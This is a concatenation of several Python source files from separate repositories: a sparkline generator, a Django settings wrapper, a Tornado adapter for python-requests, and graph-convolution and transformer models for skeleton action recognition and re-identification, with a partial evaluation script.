channel = unicode(mess.getFrom()).split('/')[0]
self.bot.log.info("\o/ %s" %self.counts[channel])
if not self.bot.from_bot(mess):
self.counts[channel] += 1
if self.counts[channel] == 3:
self.counts[channel] = 0
return r'\o/'
``` |
{
"source": "1stvamp/py-sparkblocks",
"score": 4
} |
#### File: py-sparkblocks/sparkblocks/__init__.py
```python
import math
def spark(numbers):
"""Generate a text based sparkline graph from a list of numbers (ints or
floats).
Based on:
https://github.com/holman/spark
and:
http://www.datadrivenconsulting.com/2010/06/twitter-sparkline-generator/
"""
out = []
min_value = min(numbers)
max_value = max(numbers)
value_scale = max_value - min_value
for number in numbers:
if (number - min_value) != 0 and value_scale != 0:
scaled_value = (number - min_value) / value_scale
else:
scaled_value = 0
num = math.floor(min([6, (scaled_value * 7)]))
# Hack because 9604 and 9608 aren't vertically aligned the same as
# other block elements
if num == 3:
if (scaled_value * 7) < 3.5:
num = 2
else:
num = 4
elif num == 7:
num = 6
out.append(unichr(int(9601 + num)))
return ''.join(out)
``` |
{
"source": "1stvamp/settings-wrapper",
"score": 2
} |
#### File: 1stvamp/settings-wrapper/patch_settings.py
```python
import django_project
from django_project import settings
from threading import local
from types import ModuleType
class module(ModuleType):
def __getattr__(self, name):
if name == 'STATIC_URL':
return self.get_static_url()
return getattr(settings, name)
def __setattr__(self, name, value):
return setattr(settings, name, value)
def get_static_url(self):
d = local()
request = getattr(d, 'django_current_request')
static_url = settings.STATIC_URL
if request and request.META.get('HTTP_HOST') in \
settings.STATIC_URLSTATIC_URL_MAP:
static_url = settings.STATIC_URL_MAP[request.META.get('HTTP_HOST')]
return static_url
django_project.settings = module('django_project.settings')
``` |
{
"source": "1stvamp/trequests",
"score": 3
} |
#### File: trequests/trequests/__init__.py
```python
from os import path
from urlparse import urlparse
import requests
from tornado.httpclient import AsyncHTTPClient
from tornado.simple_httpclient import SimpleAsyncHTTPClient
from tornalet import asyncify
def get_version_string():
return open(path.join(path.dirname(__file__),
'trequests_version.txt'), 'r').read().strip()
def get_version():
return get_version_string().split('.')
__version__ = get_version_string()
# Don't know how to handle this yet, so just mock it out for now
requests.adapters.extract_cookies_to_jar = lambda a, b, c: None
class AsyncHTTPAdapter(requests.adapters.HTTPAdapter):
"""A python-requests HTTP/HTTPS adapter that uses the Tornado
AsyncHTTPClient and greenlets (via the tornalet library) to perform a
non-blocking call inside the Tornado IOLoop whenever a
requests.[get/post/put/delete/request]() call is made. It then wraps the
tornado.httpclient.HTTPResponse as a requests.models.Response instance and
returns so that any library calling requests gets what it expects (mostly).
"""
def send(self, request, stream=False, timeout=None, verify=True,
cert=None, proxies=None):
http_client = AsyncHTTPClient()
# This where the magic happens, tornalet.asyncify wraps the parent
# call in a greenlet that can be swapped out the same as any
# aync tornado IO handler call.
if isinstance(http_client, SimpleAsyncHTTPClient):
resp = asyncify(http_client.fetch)(request=request.url,
method=request.method,
body=request.body,
headers=request.headers,
validate_cert=verify,
request_timeout=timeout,
)
else: # only curl_httpclient support proxy
proxy_host, proxy_port, proxy_username, proxy_password = self._parse_proxy_url(proxies)
resp = asyncify(http_client.fetch)(request=request.url,
method=request.method,
body=request.body,
headers=request.headers,
validate_cert=verify,
request_timeout=timeout,
proxy_host=proxy_host,
proxy_port=proxy_port,
proxy_username=proxy_username,
proxy_password=<PASSWORD>_password,
)
# We probably don't get this from any of the tornado adaptors, so
# we stub it out as Unknown
resp.reason = 'Unknown'
resp.content = resp.body
r = self.build_response(request, resp)
# Reset the code and content as they're not parsed by build_response
r.status_code = resp.code
r._content = resp.content
r.url = resp.effective_url
return r
def _parse_proxy_url(self, proxies):
proxy_host = proxy_port = proxy_username = proxy_password = None
if proxies:
if proxies.get('http', None):
url = proxies['http']
elif proxies.get('https', None):
url = proxies['https']
try:
o = urlparse(url)
proxy_host, proxy_port, proxy_username, proxy_password = o.hostname, o.port, o.username, o.password
return proxy_host, proxy_port, proxy_username, proxy_password
except Exception, e:
return proxy_host, proxy_port, proxy_username, proxy_password
def setup_session(session=None, mounts=None, http_client=None):
"""Mount the AsyncHTTPAdapter for a given session instance,
or for the default instance in python-requests, for a given set of mounts
or just for the default HTTP/HTTPS protocols.
"""
if http_client == "curl": # choose CurlAsyncHTTPClient
AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")
if session is None:
session = requests.session()
if mounts is None:
mounts = ('http://', 'https://')
def _session():
for mount in mounts:
session.mount(mount, AsyncHTTPAdapter())
if session is None:
requests.session = requests.sessions.session = _session
else:
_session()
``` |
{
"source": "1suancaiyu/AS-GCN",
"score": 2
} |
#### File: AS-GCN/net/as_gcn.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from net.utils.graph import Graph
class Model(nn.Module):
def __init__(self, in_channels, num_class, graph_args,
edge_importance_weighting, **kwargs):
super().__init__()
self.graph = Graph(**graph_args)
A = torch.tensor(self.graph.A, dtype=torch.float32, requires_grad=False)
self.register_buffer('A', A)
self.edge_type = 2
temporal_kernel_size = 9
spatial_kernel_size = A.size(0) + self.edge_type
st_kernel_size = (temporal_kernel_size, spatial_kernel_size)
self.data_bn = nn.BatchNorm1d(in_channels * A.size(1))
self.class_layer_0 = StgcnBlock(in_channels, 64, st_kernel_size, self.edge_type, stride=1, residual=False, **kwargs)
self.class_layer_1 = StgcnBlock(64, 64, st_kernel_size, self.edge_type, stride=1, **kwargs)
self.class_layer_2 = StgcnBlock(64, 64, st_kernel_size, self.edge_type, stride=1, **kwargs)
self.class_layer_3 = StgcnBlock(64, 128, st_kernel_size, self.edge_type, stride=2, **kwargs)
self.class_layer_4 = StgcnBlock(128, 128, st_kernel_size, self.edge_type, stride=1, **kwargs)
self.class_layer_5 = StgcnBlock(128, 128, st_kernel_size, self.edge_type, stride=1, **kwargs)
self.class_layer_6 = StgcnBlock(128, 256, st_kernel_size, self.edge_type, stride=2, **kwargs)
self.class_layer_7 = StgcnBlock(256, 256, st_kernel_size, self.edge_type, stride=1, **kwargs)
self.class_layer_8 = StgcnBlock(256, 256, st_kernel_size, self.edge_type, stride=1, **kwargs)
self.recon_layer_0 = StgcnBlock(256, 128, st_kernel_size, self.edge_type, stride=1, **kwargs)
self.recon_layer_1 = StgcnBlock(128, 128, st_kernel_size, self.edge_type, stride=2, **kwargs)
self.recon_layer_2 = StgcnBlock(128, 128, st_kernel_size, self.edge_type, stride=2, **kwargs)
self.recon_layer_3 = StgcnBlock(128, 128, st_kernel_size, self.edge_type, stride=2, **kwargs)
self.recon_layer_4 = StgcnBlock(128, 128, (3, spatial_kernel_size), self.edge_type, stride=2, **kwargs)
self.recon_layer_5 = StgcnBlock(128, 128, (5, spatial_kernel_size), self.edge_type, stride=1, padding=False, residual=False, **kwargs)
self.recon_layer_6 = StgcnReconBlock(128+3, 30, (1, spatial_kernel_size), self.edge_type, stride=1, padding=False, residual=False, activation=None, **kwargs)
if edge_importance_weighting:
self.edge_importance = nn.ParameterList([nn.Parameter(torch.ones(self.A.size())) for i in range(9)])
self.edge_importance_recon = nn.ParameterList([nn.Parameter(torch.ones(self.A.size())) for i in range(9)])
else:
self.edge_importance = [1] * (len(self.st_gcn_networks)+len(self.st_gcn_recon))
self.fcn = nn.Conv2d(256, num_class, kernel_size=1)
def forward(self, x, x_target, x_last, A_act, lamda_act):
N, C, T, V, M = x.size()
x_recon = x[:,:,:,:,0] # [2N, 3, 300, 25] wsx: x_recon(4,3,290,25) select the first person data?
x = x.permute(0, 4, 3, 1, 2).contiguous() # [N, 2, 25, 3, 300] wsx: x(4,2,25,3,290)
x = x.view(N * M, V * C, T) # [2N, 75, 300]m wsx: x(8,75,290)
x_last = x_last.permute(0,4,1,2,3).contiguous().view(-1,3,1,25) #(2N,3,1,25)
x_bn = self.data_bn(x)
x_bn = x_bn.view(N, M, V, C, T)
x_bn = x_bn.permute(0, 1, 3, 4, 2).contiguous()
x_bn = x_bn.view(N * M, C, T, V) #2N,3,290,25
h0, _ = self.class_layer_0(x_bn, self.A * self.edge_importance[0], A_act, lamda_act) # [N, 64, 300, 25]
h1, _ = self.class_layer_1(h0, self.A * self.edge_importance[1], A_act, lamda_act) # [N, 64, 300, 25]
h1, _ = self.class_layer_1(h0, self.A * self.edge_importance[1], A_act, lamda_act) # [N, 64, 300, 25]
h2, _ = self.class_layer_2(h1, self.A * self.edge_importance[2], A_act, lamda_act) # [N, 64, 300, 25]
h3, _ = self.class_layer_3(h2, self.A * self.edge_importance[3], A_act, lamda_act) # [N, 128, 150, 25]
h4, _ = self.class_layer_4(h3, self.A * self.edge_importance[4], A_act, lamda_act) # [N, 128, 150, 25]
h5, _ = self.class_layer_5(h4, self.A * self.edge_importance[5], A_act, lamda_act) # [N, 128, 150, 25]
h6, _ = self.class_layer_6(h5, self.A * self.edge_importance[6], A_act, lamda_act) # [N, 256, 75, 25]
h7, _ = self.class_layer_7(h6, self.A * self.edge_importance[7], A_act, lamda_act) # [N, 256, 75, 25]
h8, _ = self.class_layer_8(h7, self.A * self.edge_importance[8], A_act, lamda_act) # [N, 256, 75, 25]
x_class = F.avg_pool2d(h8, h8.size()[2:]) #(8,256,1,1)
x_class = x_class.view(N, M, -1, 1, 1).mean(dim=1) #(4,256,1,1)
x_class = self.fcn(x_class) #(4,60,1,1) Conv2d(256, 60, kernel_size=(1, 1), stride=(1, 1))
x_class = x_class.view(x_class.size(0), -1) #(4,60)
r0, _ = self.recon_layer_0(h8, self.A*self.edge_importance_recon[0], A_act, lamda_act) # [N, 128, 75, 25]
r1, _ = self.recon_layer_1(r0, self.A*self.edge_importance_recon[1], A_act, lamda_act) # [N, 128, 38, 25]
r2, _ = self.recon_layer_2(r1, self.A*self.edge_importance_recon[2], A_act, lamda_act) # [N, 128, 19, 25]
r3, _ = self.recon_layer_3(r2, self.A*self.edge_importance_recon[3], A_act, lamda_act) # [N, 128, 10, 25]
r4, _ = self.recon_layer_4(r3, self.A*self.edge_importance_recon[4], A_act, lamda_act) # [N, 128, 5, 25]
r5, _ = self.recon_layer_5(r4, self.A*self.edge_importance_recon[5], A_act, lamda_act) # [N, 128, 1, 25]
r6, _ = self.recon_layer_6(torch.cat((r5, x_last),1), self.A*self.edge_importance_recon[6], A_act, lamda_act) # [N, 64, 1, 25] wsx:(8,30,1,25)
pred = x_last.squeeze().repeat(1,10,1) + r6.squeeze() # [N, 3, 25] wsx:(8,30,25)
pred = pred.contiguous().view(-1, 3, 10, 25)
x_target = x_target.permute(0,4,1,2,3).contiguous().view(-1,3,10,25)
return x_class, pred[::2], x_target[::2]
def extract_feature(self, x):
N, C, T, V, M = x.size()
x = x.permute(0, 4, 3, 1, 2).contiguous()
x = x.view(N * M, V * C, T)
x = self.data_bn(x)
x = x.view(N, M, V, C, T)
x = x.permute(0, 1, 3, 4, 2).contiguous()
x = x.view(N * M, C, T, V)
for gcn, importance in zip(self.st_gcn_networks, self.edge_importance):
x, _ = gcn(x, self.A * importance)
_, c, t, v = x.size()
feature = x.view(N, M, c, t, v).permute(0, 2, 3, 4, 1)
x = self.fcn(x)
output = x.view(N, M, -1, t, v).permute(0, 2, 3, 4, 1)
return output, feature
class StgcnBlock(nn.Module):
def __init__(self,
in_channels,
out_channels,
kernel_size,
edge_type=2,
t_kernel_size=1,
stride=1,
padding=True,
dropout=0,
residual=True):
super().__init__()
assert len(kernel_size) == 2
assert kernel_size[0] % 2 == 1
if padding == True:
padding = ((kernel_size[0] - 1) // 2, 0)
else:
padding = (0,0)
self.gcn = SpatialGcn(in_channels=in_channels,
out_channels=out_channels,
k_num=kernel_size[1],
edge_type=edge_type,
t_kernel_size=t_kernel_size)
self.tcn = nn.Sequential(nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True),
nn.Conv2d(out_channels,
out_channels,
(kernel_size[0], 1),
(stride, 1),
padding),
nn.BatchNorm2d(out_channels),
nn.Dropout(dropout, inplace=True))
if not residual:
self.residual = lambda x: 0
elif (in_channels == out_channels) and (stride == 1):
self.residual = lambda x: x
else:
self.residual = nn.Sequential(nn.Conv2d(in_channels,
out_channels,
kernel_size=1,
stride=(stride, 1)),
nn.BatchNorm2d(out_channels))
self.relu = nn.ReLU(inplace=True)
def forward(self, x, A, B, lamda_act):
res = self.residual(x)
x, A = self.gcn(x, A, B, lamda_act)
x = self.tcn(x) + res
return self.relu(x), A
class StgcnReconBlock(nn.Module):
def __init__(self,
in_channels,
out_channels,
kernel_size,
edge_type=2,
t_kernel_size=1,
stride=1,
padding=True,
dropout=0,
residual=True,
activation='relu'):
super().__init__()
assert len(kernel_size) == 2
assert kernel_size[0] % 2 == 1
if padding == True:
padding = ((kernel_size[0] - 1) // 2, 0)
else:
padding = (0,0)
self.gcn_recon = SpatialGcnRecon(in_channels=in_channels,
out_channels=out_channels,
k_num=kernel_size[1],
edge_type=edge_type,
t_kernel_size=t_kernel_size)
self.tcn_recon = nn.Sequential(nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(in_channels=out_channels,
out_channels=out_channels,
kernel_size=(kernel_size[0], 1),
stride=(stride, 1),
padding=padding,
output_padding=(stride-1,0)),
nn.BatchNorm2d(out_channels),
nn.Dropout(dropout, inplace=True))
if not residual:
self.residual = lambda x: 0
elif (in_channels == out_channels) and (stride == 1):
self.residual = lambda x: x
else:
self.residual = nn.Sequential(nn.ConvTranspose2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
stride=(stride, 1),
output_padding=(stride-1,0)),
nn.BatchNorm2d(out_channels))
self.relu = nn.ReLU(inplace=True)
self.activation = activation
def forward(self, x, A, B, lamda_act):
res = self.residual(x)
x, A = self.gcn_recon(x, A, B, lamda_act)
x = self.tcn_recon(x) + res
if self.activation == 'relu':
x = self.relu(x)
else:
x = x
return x, A
class SpatialGcn(nn.Module):
def __init__(self,
in_channels,
out_channels,
k_num,
edge_type=2,
t_kernel_size=1,
t_stride=1,
t_padding=0,
t_dilation=1,
bias=True):
super().__init__()
self.k_num = k_num
self.edge_type = edge_type
self.conv = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels*k_num,
kernel_size=(t_kernel_size, 1),
padding=(t_padding, 0),
stride=(t_stride, 1),
dilation=(t_dilation, 1),
bias=bias)
def forward(self, x, A, B, lamda_act):
x = self.conv(x)
n, kc, t, v = x.size()
x = x.view(n, self.k_num, kc//self.k_num, t, v)
x1 = x[:,:self.k_num-self.edge_type,:,:,:]
x2 = x[:,-self.edge_type:,:,:,:]
x1 = torch.einsum('nkctv,kvw->nctw', (x1, A))
x2 = torch.einsum('nkctv,nkvw->nctw', (x2, B))
x_sum = x1+x2*lamda_act
return x_sum.contiguous(), A
class SpatialGcnRecon(nn.Module):
def __init__(self, in_channels, out_channels, k_num, edge_type=3,
t_kernel_size=1, t_stride=1, t_padding=0, t_outpadding=0, t_dilation=1,
bias=True):
super().__init__()
self.k_num = k_num
self.edge_type = edge_type
self.deconv = nn.ConvTranspose2d(in_channels=in_channels,
out_channels=out_channels*k_num,
kernel_size=(t_kernel_size, 1),
padding=(t_padding, 0),
output_padding=(t_outpadding, 0),
stride=(t_stride, 1),
dilation=(t_dilation, 1),
bias=bias)
def forward(self, x, A, B, lamda_act):
x = self.deconv(x)
n, kc, t, v = x.size()
x = x.view(n, self.k_num, kc//self.k_num, t, v)
x1 = x[:,:self.k_num-self.edge_type,:,:,:]
x2 = x[:,-self.edge_type:,:,:,:]
x1 = torch.einsum('nkctv,kvw->nctw', (x1, A))
x2 = torch.einsum('nkctv,nkvw->nctw', (x2, B))
x_sum = x1+x2*lamda_act
return x_sum.contiguous(), A
```
#### File: AS-GCN/net/model_poseformer.py
```python
import math
import logging
from functools import partial
from collections import OrderedDict
from einops import rearrange, repeat
import torch
import torch.nn as nn
import torch.nn.functional as F
from timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD
from timm.models.helpers import load_pretrained
from timm.models.layers import DropPath, to_2tuple, trunc_normal_
from timm.models.registry import register_model
class Mlp(nn.Module):
def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):
super().__init__()
out_features = out_features or in_features
hidden_features = hidden_features or in_features
self.fc1 = nn.Linear(in_features, hidden_features)
self.act = act_layer()
self.fc2 = nn.Linear(hidden_features, out_features)
self.drop = nn.Dropout(drop)
def forward(self, x):
x = self.fc1(x)
x = self.act(x)
x = self.drop(x)
x = self.fc2(x)
x = self.drop(x)
return x
class Attention(nn.Module):
def __init__(self, dim, num_heads=8, qkv_bias=False, qk_scale=None, attn_drop=0., proj_drop=0.):
super().__init__()
self.num_heads = num_heads
head_dim = dim // num_heads
# NOTE scale factor was wrong in my original version, can set manually to be compat with prev weights
self.scale = qk_scale or head_dim ** -0.5
self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)
self.attn_drop = nn.Dropout(attn_drop)
self.proj = nn.Linear(dim, dim)
self.proj_drop = nn.Dropout(proj_drop)
def forward(self, x):
B, N, C = x.shape
qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)
q, k, v = qkv[0], qkv[1], qkv[2] # make torchscript happy (cannot use tensor as tuple)
attn = (q @ k.transpose(-2, -1)) * self.scale
attn = attn.softmax(dim=-1)
attn = self.attn_drop(attn)
x = (attn @ v).transpose(1, 2).reshape(B, N, C)
x = self.proj(x)
x = self.proj_drop(x)
return x
class Block(nn.Module):
def __init__(self, dim, num_heads, mlp_ratio=4., qkv_bias=False, qk_scale=None, drop=0., attn_drop=0.,
drop_path=0., act_layer=nn.GELU, norm_layer=nn.LayerNorm):
super().__init__()
self.norm1 = norm_layer(dim)
self.attn = Attention(
dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=drop)
# NOTE: drop path for stochastic depth, we shall see if this is better than dropout here
self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity()
self.norm2 = norm_layer(dim)
mlp_hidden_dim = int(dim * mlp_ratio)
self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop)
def forward(self, x):
x = x + self.drop_path(self.attn(self.norm1(x)))
x = x + self.drop_path(self.mlp(self.norm2(x)))
return x
class PoseTransformer(nn.Module):
def __init__(self, num_frame=9, num_joints=25, in_chans=3, embed_dim_ratio: object = 32, depth=4,
num_heads=8, mlp_ratio=2., qkv_bias=True, qk_scale=None,
drop_rate=0., attn_drop_rate=0., drop_path_rate=0.2, norm_layer=None,
num_class=60
):
""" ##########hybrid_backbone=None, representation_size=None,
Args:
num_frame (int, tuple): input frame number
num_joints (int, tuple): joints number
in_chans (int): number of input channels, 2D joints have 2 channels: (x,y)
embed_dim_ratio (int): embedding dimension ratio
depth (int): depth of transformer
num_heads (int): number of attention heads
mlp_ratio (int): ratio of mlp hidden dim to embedding dim
qkv_bias (bool): enable bias for qkv if True
qk_scale (float): override default qk scale of head_dim ** -0.5 if set
drop_rate (float): dropout rate
attn_drop_rate (float): attention dropout rate
drop_path_rate (float): stochastic depth rate
norm_layer: (nn.Module): normalization layer
num_class (int): the pose action class amount 30
"""
super().__init__()
norm_layer = norm_layer or partial(nn.LayerNorm, eps=1e-6)
embed_dim = embed_dim_ratio * num_joints #### temporal embed_dim is num_joints * spatial embedding dim ratio
out_dim = num_joints * 3 #### output dimension is num_joints * 3
### spatial patch embedding
self.Spatial_patch_to_embedding = nn.Linear(3, 32)
self.Spatial_pos_embed = nn.Parameter(torch.zeros(1, num_joints, embed_dim_ratio))
self.Temporal_pos_embed = nn.Parameter(torch.zeros(1, num_frame, embed_dim))
self.pos_drop = nn.Dropout(p=drop_rate)
dpr = [x.item() for x in torch.linspace(0, drop_path_rate, depth)] # stochastic depth decay rule
self.Spatial_blocks = nn.ModuleList([
Block(
dim=embed_dim_ratio, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,
drop=drop_rate, attn_drop=attn_drop_rate, drop_path=dpr[i], norm_layer=norm_layer)
for i in range(depth)])
self.blocks = nn.ModuleList([
Block(
dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,
drop=drop_rate, attn_drop=attn_drop_rate, drop_path=dpr[i], norm_layer=norm_layer)
for i in range(depth)])
self.Spatial_norm = norm_layer(embed_dim_ratio)
self.Temporal_norm = norm_layer(embed_dim)
####### A easy way to implement weighted mean
self.weighted_mean = torch.nn.Conv1d(in_channels=num_frame, out_channels=1, kernel_size=1)
self.head = nn.Sequential(
nn.LayerNorm(embed_dim),
nn.Linear(embed_dim , out_dim),
)
# wsx aciton_class_head
self.action_class_head = nn.Conv2d(290, num_class, kernel_size=1)
# self.data_bn = nn.BatchNorm1d(in_channels * A.size(1))
self.data_bn = nn.BatchNorm1d(3 * 25)
def Spatial_forward_features(self, x):
b, _, f, p = x.shape ##### b is batch size, f is number of frames, p is number of joints
x = rearrange(x, 'b c f p -> (b f) p c', )
x = self.Spatial_patch_to_embedding(x)
x += self.Spatial_pos_embed
x = self.pos_drop(x)
for blk in self.Spatial_blocks:
x = blk(x)
x = self.Spatial_norm(x)
x = rearrange(x, '(b f) w c -> b f (w c)', f=f)
return x
def forward_features(self, x):
b = x.shape[0]
x += self.Temporal_pos_embed
x = self.pos_drop(x)
for blk in self.blocks:
x = blk(x)
x = self.Temporal_norm(x)
##### x size [b, f, emb_dim], then take weighted mean on frame dimension, we only predict 3D pose of the center frame
# x = self.weighted_mean(x) #wsx don't change all frame to one
# x = x.view(b, 1, -1)
return x
def forward(self, x, x_target):
'''
# x input shape [170, 81, 17, 2]
x = x.permute(0, 3, 1, 2) #[170, 2, 81, 17]
b, _, _, p = x.shape #[170, 2, 81, 17] b:batch_size p:joint_num
### now x is [batch_size, 2 channels, receptive frames, joint_num], following image data
'''
N, C, T, V, M = x.size()
x = x.permute(0, 4, 3, 1, 2).contiguous()
x = x.view(N * M, V * C, T)
x = self.data_bn(x)
x = x.view(N, M, V, C, T)
x = x.permute(0, 1, 3, 4, 2).contiguous()
x = x.view(N * M, C, T, V)
x = self.Spatial_forward_features(x)
x = self.forward_features(x) # (2n, 290,800)
# action_class_head
BatchN, FrameN, FutureN = x.size()
x = x.view(BatchN, FrameN, FutureN, 1)
x_class = F.avg_pool2d(x, x.size()[2:])
x_class = x_class.view(N, M, -1, 1, 1).mean(dim=1)
x_class = self.action_class_head(x_class)
x_class = x_class.view(x_class.size(0), -1)
#action_class = x.permute(0,2,1) #[170, 544, 1]
#action_class = self.action_class_head(action_class)
#action_class = torch.squeeze(action_class)
#x = self.head(x)
#x = x.view(b, 1, p, -1)
x_target = x_target.permute(0, 4, 1, 2, 3).contiguous().view(-1, 3, 10, 25)
return x_class, x_target[::2] # [170,1,17,3]
``` |
{
"source": "1suancaiyu/Locality-Awareness-SGE",
"score": 2
} |
#### File: 1suancaiyu/Locality-Awareness-SGE/evaluate.py
```python
import tensorflow as tf
from tensorflow.python.layers.core import Dense
import numpy as np
import time
import matplotlib as mpl
import copy
import os
from tensorflow.python.ops import rnn_cell_impl
# mpl.use('Agg')
# import matplotlib.pyplot as plt
import os
# Number of Epochs
epochs = 100
# Batch Size
batch_size = 128
# RNN Size k = 256
rnn_size = 256
# Number of Layers, 2-layer LSTM
num_layers = 2
# Time Steps of Input, f = 6 skeleton frames
time_steps = 6
# Length of Series, J = 20 body joints in a sequence
series_length = 20
# Learning Rate
learning_rate = 0.0005
lr_decay = 0.95
momentum = 0.5
lambda_l2_reg = 0.02
dataset = False
attention = False
manner = False
gpu = False
permutation_flag = False
permutation_test_flag = False
permutation_test_2_flag = False
permutation = 0
test_permutation = 0
test_2_permutation = 0
Reverse = True
use_attention = True
Bi_LSTM = False
AGEs = True
Frozen = False
# Keep all following default parameters unchanged to evaluate the best model
tf.app.flags.DEFINE_string('attention', 'LA', "(LA) Locality-oriented Attention Alignment or BA (Basic Attention Alignment)")
tf.app.flags.DEFINE_string('manner', 'ap', "average prediction (ap) or sequence-level concatenation (sc)")
tf.app.flags.DEFINE_string('dataset', 'BIWI', "Dataset: BIWI or IAS or KGBD")
tf.app.flags.DEFINE_string('length', '6', "4, 6, 8 or 10")
tf.app.flags.DEFINE_string('gpu', '0', "GPU number")
tf.app.flags.DEFINE_string('frozen', '0', "Freeze CAGEs for contrastive learning")
tf.app.flags.DEFINE_string('c_reid', '0', "Peform re-id use projection vectors")
tf.app.flags.DEFINE_string('t', '0.05', "Temperature for contrastive learning")
tf.app.flags.DEFINE_string('train_flag', '1', "Choose to train (1) or test (0)")
tf.app.flags.DEFINE_string('view', 'None', "Choose different views for KS20")
tf.app.flags.DEFINE_string('transfer', 'None', "Choose a dataset's encoding model to transfer encoding")
tf.app.flags.DEFINE_string('best_model', 'rev_rec', "rev_rec (Rev. Rec.) or rev_rec_plus(Rev. Rec. Plus)")
tf.app.flags.DEFINE_string('RN_dir', 'None', "Choose the model directory to evaluate")
FLAGS = tf.app.flags.FLAGS
config = tf.ConfigProto()
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
temperature = 0.1
config.gpu_options.allow_growth = True
view = 'view_'
transfer = 'None'
Model = 'rev_rec'
IAS_test = 'A'
RN_dir = 'None'
def main(_):
global attention, dataset, series_length, epochs, time_steps, gpu, manner, frames_ps, \
temperature, Frozen, C_reid, temperature, train_flag, view, use_attention, transfer, Model, IAS_test
attention, dataset, gpu, manner, length, Frozen, C_reid, temperature, train_flag, view_num, transfer, Model, RN_dir = FLAGS.attention, \
FLAGS.dataset, FLAGS.gpu, FLAGS.manner, \
FLAGS.length, FLAGS.frozen, FLAGS.c_reid, \
FLAGS.t, FLAGS.train_flag, FLAGS.view, FLAGS.transfer, FLAGS.best_model, FLAGS.RN_dir
# Choose different datasets and models (Rev. Reconstruction or Rev. Reconstruction++) to evaluate
if dataset not in ['BIWI', 'IAS', 'KGBD', 'KS20']:
raise Exception('Dataset must be BIWI, IAS, KGBD, or KS20.')
if Model not in ['prediction', 'sorting', 'rev_rec', 'rev_rec_plus']:
raise Exception('Model must be rev_rec or rev_rec_plus')
# Keep all following default parameters unchanged to evaluate the best model
if attention not in ['BA', 'LA']:
raise Exception('Attention must be BA or LA.')
if manner not in ['sc', 'ap']:
raise Exception('Training manner must be sc or ap.')
if not gpu.isdigit() or int(gpu) < 0:
raise Exception('GPU number must be a positive integer.')
if length not in ['4', '6', '8', '10']:
raise Exception('Length number must be 4, 6, 8 or 10.')
if Frozen not in ['0', '1']:
raise Exception('Frozen state must be 0 or 1.')
if C_reid not in ['0', '1']:
raise Exception('C_reid state must be 0 or 1.')
if train_flag not in ['0', '1', '2']:
raise Exception('Train_flag must be 0, 1 or 2 (Only evaluation).')
if view_num not in ['0', '1', '2', '3', '4', 'None']:
raise Exception('View_num must be 0, 1, 2, 3, 4 or None')
if transfer not in ['BIWI', 'IAS', 'KGBD', 'KS20', 'None']:
raise Exception('Transfer dataset must be BIWI, IAS, KGBD, KS20 or None')
os.environ['CUDA_VISIBLE_DEVICES'] = gpu
folder_name = dataset + '_' + attention
series_length = 20
if dataset == 'KS20':
series_length = 25
view += view_num
if view_num == 'None':
view = ''
if transfer != 'None':
train_flag = '0'
time_steps = int(length)
temperature = float(temperature)
frames_ps = dataset + '/' + str(time_steps) + '/'
epochs = 400
if dataset != 'KS20':
view = ''
if dataset == 'KGBD':
temperature = 0.5
else:
temperature = 0.1
# Rev. Reconstruction
if RN_dir == 'None':
print(
' ## Dataset: %s\n ## Attention: %s\n ## Re-ID Manner: %s\n ## Sequence Length: %s\n ## Tempearture: %s\n ## Pretext Task: %s\n ## GPU: %s\n' %
(dataset, attention, manner, str(time_steps), str(temperature), Model, str(gpu)))
if Model == 'rev_rec':
if dataset == 'IAS':
IAS_test = 'A'
evaluate_reid('./Models/CAGEs_RN_models/IAS-A_' + attention + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
IAS_test = 'B'
evaluate_reid(
'./Models/CAGEs_RN_models/IAS-B_' + attention + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
else:
evaluate_reid(
'./Models/CAGEs_RN_models/' + dataset + '_' + attention + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
# Rev. Reconstruction ++
elif Model == 'rev_rec_plus':
if dataset == 'IAS':
try:
IAS_test = 'A'
evaluate_reid('./Models/CAGEs_RN_models/IAS-A' + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
IAS_test = 'B'
evaluate_reid(
'./Models/CAGEs_RN_models/IAS-B' + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
except:
IAS_test = 'A'
evaluate_reid('./Models/CAGEs_RN_models/IAS' + '_BA_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
IAS_test = 'B'
evaluate_reid(
'./Models/CAGEs_RN_models/IAS' + '_BA_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
else:
evaluate_reid(
'./Models/CAGEs_RN_models/' + dataset + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view+ 'pre_' + Model)
else:
evaluate_reid(
'./Models/CAGEs_RN_models/' + dataset + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
else:
try:
settings = RN_dir.split('_')
